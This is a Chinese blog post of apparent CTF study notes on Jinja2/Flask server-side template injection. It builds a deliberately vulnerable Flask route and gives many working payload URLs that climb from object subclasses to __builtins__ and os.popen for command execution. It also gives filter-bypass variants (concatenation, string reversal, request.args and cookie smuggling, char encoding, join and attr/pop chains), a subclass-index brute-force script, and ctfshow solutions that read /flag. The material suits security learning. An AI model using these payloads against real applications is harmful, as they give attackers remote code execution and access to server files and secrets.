学习ssti

最新推荐文章于 2024-05-11 17:01:53 发布
最新推荐文章于 2024-05-11 17:01:53 发布
阅读量384 收藏 1
点赞数 2
文章标签: flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58624515/article/details/127991339
版权

ssti也叫做模板注入

当不正确的使用模板引擎进行渲染时,则会造成模板注入

比如render_template_string函数,当参数可控时,会造成模板注入

在Python的ssti中,大部分是依靠基类->子类->危险函数的方式来利用ssti

python沙箱逃逸总结 这是别人的文章

__class__ 返回对象所属的类

__bases__以元组的形式返回一个类所直接继承的类

__base__以字符串返回一个类所直接继承的类。

__mro__返回解析方法调用的顺序。

__subclasses__()获取类的所有子类。

__init__所有自带类都包含init方法,便于利用他当跳板来调用globals。

__globals__

function.__globals__,用于获取function所处空间下可使用的module、方法以及所有变量。

我们如何利用这些来进行执行命令呢

from flask import Flask, request, render_template_string
app = Flask(__name__)
@app.route('/flag/')
def flag():
    code = request.args.get('id')
    html = '''
        hello, do you have id ? , %s
    ''' % code
    return render_template_string(html)

if __name__ == '__main__':
    app.run(host='127.0.0.1' , port='5000')

782d8bee62a620a9af36cec5d1cb8822.png

返回''所属的类,我们的目的是获取到它的基类,Object,使用__base__,__bases__,__mro__殊途同归

控制结构 {% %}

变量取值 {{ }}

注释 {# #}

e4cca510b163c1affca0c603a57ce05d.png

3a8df8afb0d4a753fccf1d5f8bafe7ca.png

fd23d252e4265f2a055c1ee47dcd48ed.png

获取到基类后,在通过基类获取到它下面所有的子类,

可以寻找catch_warnings因为catch_warning是function具有__globals__

1400886f22f19c494d21f71a5454a7ee.png

7d01838a4312aa81131fdba3d7320865.png

寻找到function即可,我这边习惯找catch_warnings

在本地寻找的脚本

import jinja2
num=0
for i in ''.__class__.__base__.__subclasses__():
	if 'catch_warnings' in str(i):
		print(num)
	num=num+1

我们在__globals__的属性__builtins__里面发现了很多函数

11f9d9674f9b1e2c2bbfaa8f82132420.png

比如说__import__,eval函数我们可以调用这些来getshell

cc226cb59eb25f4aea241e36148469d3.png

调用__import__声明os库,使用popen函数执行命令,read读取到页面上

2095c0e0dd43524f37487ea50581dea9.png

又比如说通过eval函数调用__import__

既然在本地打通了,我们尝试开启靶机,在web页面尝试

13a695aa6d357f58743c1407cfbdf14b.png

看到这个场景,我们使用索引,一个一个取数就不太现实,有两个方法

一个通过jinja2的{%%}语句

一个通过python来寻找

import requests
for i in range(1,300):
	url="http://127.0.0.1:5000/flag/?id={{%27%27.__class__.__mro__[1].__subclasses__()["+str(i)+"]}}"
	r=requests.get(url)
	if "catch_warnings" in r.text:
		print(i)

cdae6982d3c97debd9c0108d4c647591.png

07109cb6b389f84f66cdd256feb3e614.png

然后我们可以去通过使用函数getshell了

4493440e8f82303b502cc08d052a49b5.png

还有一种就是通过jinja2的语句控制

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{c.__init__.__globals__['__builtins__']['__import__']('os').popen("dir").read()}}
{% endif %}
{% endfor %}

8630a8df41e7a5340ac03b96a3ec461f.png

当然还有一种办法就是它预定义好的

ca72f646f6f3662d8233b7aa11534978.png

60f9da43dfc3955af7b5ef65d4b5214e.png

http://127.0.0.1:5000/flag/?id={{x.__init__.__globals__.__builtins__.__import__('os').popen('dir').read()}}
http://127.0.0.1:5000/flag/?id={{config.__init__.__globals__.__builtins__.__import__('os').popen('dir').read()}}

也可以用这个语句读取放在环境中的变量

{{url_for.__globals__['current_app'].config}}

web有注入的地方就会有正则的存在

from flask import Flask, request, render_template_string
import re
app = Flask(__name__)
@app.route('/flag/')
def flag():
    code = request.args.get('id')
    if re.match('__class__',code):
        html="checked"
    else:
        html = '''
            hello, do you have id ? , %s
        ''' % code
    return render_template_string(html)

if __name__ == '__main__':
    app.run(host='127.0.0.1' , port='5000')

我们看到正则过滤了__class__,我们应该如何绕过呢

首先知道 ''.__class__和''['__class__']是一样的效果,我们可以通过

['__cla'+'ss__']如绕过__class__的限制

http://127.0.0.1:5000/flag/?id={{''['__cl'+'ass__']['__base__']['__subclasses__']()[220]['__init__']['__globals__']['__builtins__']['__import__']('os').popen('dir').read()}}

ee11b598c9e5648d01066d115e92ac2f.png

我们也可以使用倒序[::-1]来进行绕过

ad80d814a6658b0c7ea79e279518f9a9.png

http://127.0.0.1:5000/flag/?id={{''['__ssalc__'[::-1]]['__base__']['__subclasses__']()[220]['__init__']['__globals__']['__builtins__']['__import__']('os').popen('dir').read()}}

也可以使用flask框架的request函数

get: request.args.x //GET形式传递x

post: request.forms.x //POST形式传递x

cookie: request.cookies.x //COOKIE传递x

get方式绕过

url: http://127.0.0.1:5000/flag/?id={{''[request.args.x][request.args.x1][request.args.x2]()[220][request.args.x3][request.args.x4][request.args.x5].eval(request.args.x6)}}

get: x=__class__&x1=__base__&x2=__subclasses__&x3=__init__&x4=__globals__&x5=__builtins__&x6=__import__('os').popen('dir').read()

58791b9d85f14ff61cae0737eddd4b6d.png

http://127.0.0.1:5000/flag/?id={{''[request.args.x][request.args.x1][request.args.x2]()[220][request.args.x3][request.args.x4][request.args.x5].eval(request.args.x6)}}&x=__class__&x1=__base__&x2=__subclasses__&x3=__init__&x4=__globals__&x5=__builtins__&x6=__import__('os').popen('dir').read()

post:

不允许的方式

cookie:

url=http://127.0.0.1:5000/flag/?id={{''[request.cookies.x][request.cookies.x1][request.cookies.x2]()[220][request.cookies.x3][request.cookies.x4][request.cookies.x5].eval(request.cookies.x6)}}

cookie:x=__class__;x1=__base__;x2=__subclasses__;x3=__init__;x4=__globals__;x5=__builtins__;x6=__import__('os').popen('dir').read()

0d8af2749be7be536e7675a98034f766.png

 

编码绕过:

"{0:c}".format(97)='a'

"{0:c}{1:c}{2:c}{3:c}{4:c}{5:c}{6:c}{7:c}{8:c}".format(95,95,99,108,97,115,115,95,95)='__class__'

4d8fb03a35ccefc9bebb65c17419ae73.png

http://127.0.0.1:5000/flag/?id={{''["{0:c}{1:c}{2:c}{3:c}{4:c}{5:c}{6:c}{7:c}{8:c}".format(95,95,99,108,97,115,115,95,95)].__base__.__subclasses__()[220].__init__.__globals__['__builtins__'].__import__('os').popen('dir').read()}}

join绕过:

[1,2,3]|join

19f28d1b1c4b65a95c6b7d47c011e3b5.png

104fa9e25855f8b3283636f50bd0d357.png

{% set a=['__','class','__']|join %}{{''[a].__base__.__subclasses__()[220].__init__.__globals__.__builtins__.__import__('os').popen('dir').read()}}

我们也可以利用函数直接绕过__class__的限制

http://127.0.0.1:5000/flag/?id={{x.__init__.__globals__.__builtins__.__import__('os').popen('dir').read()}}

c89ee942f3a6a0b0890659d73d7ebb28.png

通过拼接绕过

http://127.0.0.1:5000/flag/?id={% set a=(()|select|string)[24]~(()|select|string)[24]~(()|select|string)[15]~(()|select|string)[20]~(()|select|string)[6]~(()|select|string)[18]~(()|select|string)[18]~(()|select|string)[24]~(()|select|string)[24] %}{{''[a].__base__.__subclasses__()[220].__init__.__globals__.__builtins__.__import__('os').popen('dir').read()}}

57da65c8184f916468534e4a06eed744.png

绕过暂时就写道这里吧:

我们进入实战的一些题目吧

ctfshow365

5a9173d42fe140e80e1a2fd379571b69.png

c4d710e96267c41282cce1e538372257.png

args也被禁了

12d4ee8394760fdc9ca8ee0148005bbd.png

cookies传参可以使用

c434d02e68834648d0c498f956b83d29.png

引号也被禁了

简单的绕过

url={{x.__init__.__globals__.__builtins__.__import__(request.cookies.x).popen(request.cookies.x1).read()}}

cookie: x=os;x1=ls /

c0a652a439646b722485d69bc11e0331.png

 

ctfshow369

在往后面就不礼貌了,也看不懂了

分析一下大佬的wp吧

3a9ef7b17455d49f908a095b31d242c9.png

 

http://ec6b99bb-953a-4e28-8962-084bda49c739.chall.ctf.show/
?name=
{% set po=dict(po=a,p=a)|join%}	//获取pop函数,通过join
{% set a=(()|select|string|list)|attr(po)(24)%}  //利用pop(xx)代替[xx]获取_
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}   //拼接__init__
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}	//拼接__globals__
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}	//拼接__getitem__
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%} //拼接__builtins__
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%} //拼接(q|attr('__init__')|attr('__globals__')|attr('__getitem__'))('__builtins__')
{% set chr=x.chr%} //获取chr函数
{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%} //利用chr拼接/flag
{%print(x.open(file).read())%}	//利用__builtins__的open函数读取

bb19ff5ca0f73502098887c92cfd9224.png

 

Ni_ght
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSTI
03-09
SSTI
fenjing工具,ssti
12-17
fenjing一把梭哈ssti,简单绕过waf
SSTI入门详解
E1even的博客
03-15 4967
关于基于flask的SSTI漏洞的阶段学习小结: SSTI的理解: SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。 SSTI引发的真正原因: render_template渲染函数的问题 render_template渲染函数是什么: 就是把HTML涉及的页面与用户数据分离开,这样方便展示和管理。当用户输入自己的数据信息,HTML页面可以根据用户自身的信息来展示页面,因此才有了这个函数的使用。 ...
Python中的SSTI (一)
qq_43511094的博客
03-21 5347
模板注入什么是Flask什么是SSTI什么是JinJa2什么是模板引擎Jinja2 详细知识基本语法基本用法一般用法for语句的使用if 语句继承filter 语句的使用空白行处理类的详细知识SSTI的payloadpopen()方法python中的SSTI常用的payload 什么是Flask Flask是一个轻量级的python的web框架。轻量级说明他只适用于构建小型网站。 什么是SSTI SSTI,Server-Site Template Injection,即服务器模板注入。同XSS注入,SQL
Python 开发 框架安全:SSTI 模板注入漏洞测试.
最新发布
网络安全领域___专研者.
05-11 372
SSTI (Server-Side Template Injection) 是一种Web应用程序安全漏洞,它发生在应用程序使用模板引擎渲染用户输入时。当应用程序将用户输入直接插入到模板中而不进行充分的过滤和验证时,就可能导致SSTI漏洞。攻击者可以利用这个漏洞注入恶意代码到模板中,从而执行任意命令,窃取敏感信息或者进一步渗透系统。
SSTI---总结
wwwwyyyrre的博客
06-12 2263
1)过滤[]和.只过滤[]pop() 函数用于移除列表中的一个元素(默认最后一个元素),并且返回该元素的值。若.也被过滤,使用原生JinJa2函数|attr()将request.__class__改成request|attr("__class__")(2)过滤_利用request.args属性将其中的request.args改为request.values则利用post的方式进行传参(3)关键字过滤base64编码绕过__getattribute__使用实例访问属性时,调用该方法。
SSTI模板注入
qq_48904485的博客
03-22 4991
一、SSTI简介 SSTI就是服务器端模板注入(Server-Side Template Injection),SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。 sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到
深入浅出带你了解SSTI模板注入
qq_44005305的博客
01-01 891
服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。今天比较详细的讲了SSTI模板注入漏洞的原理以及应用方法,可能刚开始学不太好理解,可以根据之前SQL注入的思路去理解一下。有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。# 学习计划安排我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
flaskssti:测试SSTI
02-21
烧瓶
全国大学生信息安全竞赛决赛web4,SSTI+TensorFlow模型.zip
01-27
2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 3、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。 全国大...
SSTI详解 一文了解SSTI和所有常见payload 以flask模板为例
闵行小鱼塘
10-13 5419
做的ctf题里有好几道跟SSTI有关,故对SSTI进行学习,在此做个小结与记录
ssti模板总结
ANYOUZHEN的博客
06-02 129
如果用户输入作为【模板当中变量 的值】,模板引擎一般会对用户输入进行编码转义,不容易造成XSS攻击。这段代码输入会原样输出,因为进行了HTML实体编码。但是如果用户输入作为了【模板内容 的一部分】,用户输入会原样输出。这段代码输入会造成XSS漏洞。如果输入,会执行2*8这个语句,输出。因为经过渲染后,模板变成了。不同的模板会有不同的语法,一般使用Detect-Identify-Expoit的利用流程。模板总结:模板总结
SSTI学习记录
cjdgg的博客
05-03 1509
SSTI学习记录环境语法变量过滤器 环境 from flask import Flask from flask import render_template from flask import request from flask import render_template_string app = Flask(__name__) @app.route('/test/') def test(): code = request.args.get('id') template = '''
CTF SSTI 一些记录
3569
10-13 5809
https://ctftime.org/writeup/10895 https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/   ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼ This writeup is written by @kazkiti_ctf GET / HTTP/1.1 Host: shri...
python安全之学习笔记(一)
郁离歌丶的博客
09-29 4125
暑假想深入学习下pythonweb的,结果被一堆事缠着,只能勉勉强强看了下ssti模板注入的一些东西。真的是菜的糟心,暑假又是一事无成。 0X00.浅谈关于python引发的安全问题 pythonweb的话代码方面的问题最多的可能就是SSTI模板注入、沙盒逃逸及反序列化,一般来说,使用django的模板渲染能够抵御很多的xss攻击,sql注入现在确实已经很少了,orm框架的使用,导致sql注入...
PYthon继承链(egg)的思考和实战
蚁景网安学院
05-25 421
PYthon继承链(egg)的思考与实战前言起初学习ssti的时候,就只是拿着tplmap一顿乱扫,然后进行命令执行,之前深入学习了一下PYthon继承链;今天写个文章进行加深记忆...
SSTI漏洞初手入门
kracer的博客
01-08 939
0x01 什么是SSTI SSTI,即服务器端模板注入(Server-Side Template Injection)。攻击者在服务器输入语句,服务端将其作为Web应用模板内容的一部分,在进行目标编译渲染的过程中,进行了语句的拼接,执行了所插入的恶意内容,从而导致信息泄露、代码执行、GetShell等问题。 补充: 1)模板引擎是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的文档,就是将模板文件和数据通过...
web入门--ssti
whisper921的博客
04-16 2725
web361 注入点是?name。 ?name={{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} 利用的是os._wrap_close类 得到flag ctfshow{77ca18dd-38c5-4a9c-a735-522a8af345c9} web362 可以用以下已有的函数,去得到__builtins__,然后用eval就可以了:
flask ssti
09-26
Flask SSTI(Server-Side Template Injection)是指在Flask应用中,由于未正确处理用户输入,导致用户输入的模板言被当作代码执行的漏洞。攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值